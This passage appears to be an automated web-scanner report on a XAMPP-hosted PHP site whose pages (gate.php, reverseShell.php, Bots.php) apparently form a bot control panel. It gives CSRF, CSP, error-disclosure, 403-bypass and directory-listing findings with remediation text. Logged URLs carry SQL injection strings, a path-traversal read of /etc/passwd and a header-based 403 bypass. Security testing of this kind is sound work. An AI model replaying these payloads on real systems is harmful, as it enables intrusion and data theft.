| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="GET"> |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="GET"> |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form method="POST"> |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 7 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
| Reference |
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/352.html |
| Tags |
OWASP_2021_A01
WSTG-v42-SESS-05 OWASP_2017_A05 |
| CWE Id | 352 |
| WASC Id | 9 |
| Plugin Id | 10202 |
|
Medium |
Anti-CSRF Tokens Check |
|---|---|
| Description |
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
* The victim has an active session on the target site.
* The victim is authenticated via HTTP auth on the target site.
* The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 603 bytes. | |
| Request Body - size: 57 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| Instances | 3 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
| Reference |
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/352.html |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-05 OWASP_2017_A06 |
| CWE Id | 352 |
| WASC Id | 9 |
| Plugin Id | 20012 |
|
Medium |
Application Error Disclosure |
|---|---|
| Description |
This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <b>Warning</b>: Undefined array key "id" in <b>C:\xampp\htdocs\TQUIA729JAULAMJS\tasks_page.php</b> on line <b>20</b><br /> |
| Request Header - size: 459 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 389 bytes. | |
| Response Body - size: 131 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| Instances | 10 |
| Solution |
Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user.
|
| Reference | |
| Tags |
WSTG-v42-ERRH-02
WSTG-v42-ERRH-01 OWASP_2021_A05 OWASP_2017_A06 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 90022 |
|
Medium |
Bypassing 403 |
|---|---|
| Description |
Bypassing 403 endpoints may be possible, the scan rule sent a payload that caused the response to be accessible (status code 200).
|
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | |
| Attack | x-original-url: /TQUIA729JAULAMJS |
| Evidence | |
| Request Header - size: 184 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | |
| Attack | x-original-url: /TQUIA729JAULAMJS/Sound%20Effects |
| Evidence | |
| Request Header - size: 200 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| Instances | 2 |
| Solution | |
| Reference |
https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf https://www.contextis.com/en/blog/server-technologies-reverse-proxy-bypass |
| Tags |
OWASP_2021_A01
WSTG-v42-ATHN-04 OWASP_2017_A05 |
| CWE Id | |
| WASC Id | |
| Plugin Id | 40038 |
|
Medium |
Content Security Policy (CSP) Header Not Set |
|---|---|
| Description |
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
|
| URL | http://142.202.242.172 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 148 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 149 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 159 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 160 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 165 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 626 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 241 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 566 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 175 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 379 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 197 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 393 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 290 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 209 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 459 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=¶ms=*&task_select=8&unit_EXEC=18.9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 709 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 468 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 363 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20- |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 766 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 363 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1¶ms=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 972 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 247 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 603 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 197 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 533 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 197 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 479 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 647 bytes. | |
| Request Body - size: 69 bytes. | |
| Response Header - size: 363 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 50 |
| Solution |
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.
|
| Reference |
https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html https://www.w3.org/TR/CSP/ https://w3c.github.io/webappsec-csp/ https://web.dev/articles/csp https://caniuse.com/#feat=contentsecuritypolicy https://content-security-policy.com/ |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 |
| CWE Id | 693 |
| WASC Id | 15 |
| Plugin Id | 10038 |
|
Medium |
Directory Browsing |
|---|---|
| Description |
It is possible to view a listing of the directory contents. Directory listings may reveal hidden scripts, include files, backup source files, etc., which can be accessed to reveal sensitive information.
|
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | http://142.202.242.172/xampp/ |
| Evidence | Parent Directory |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
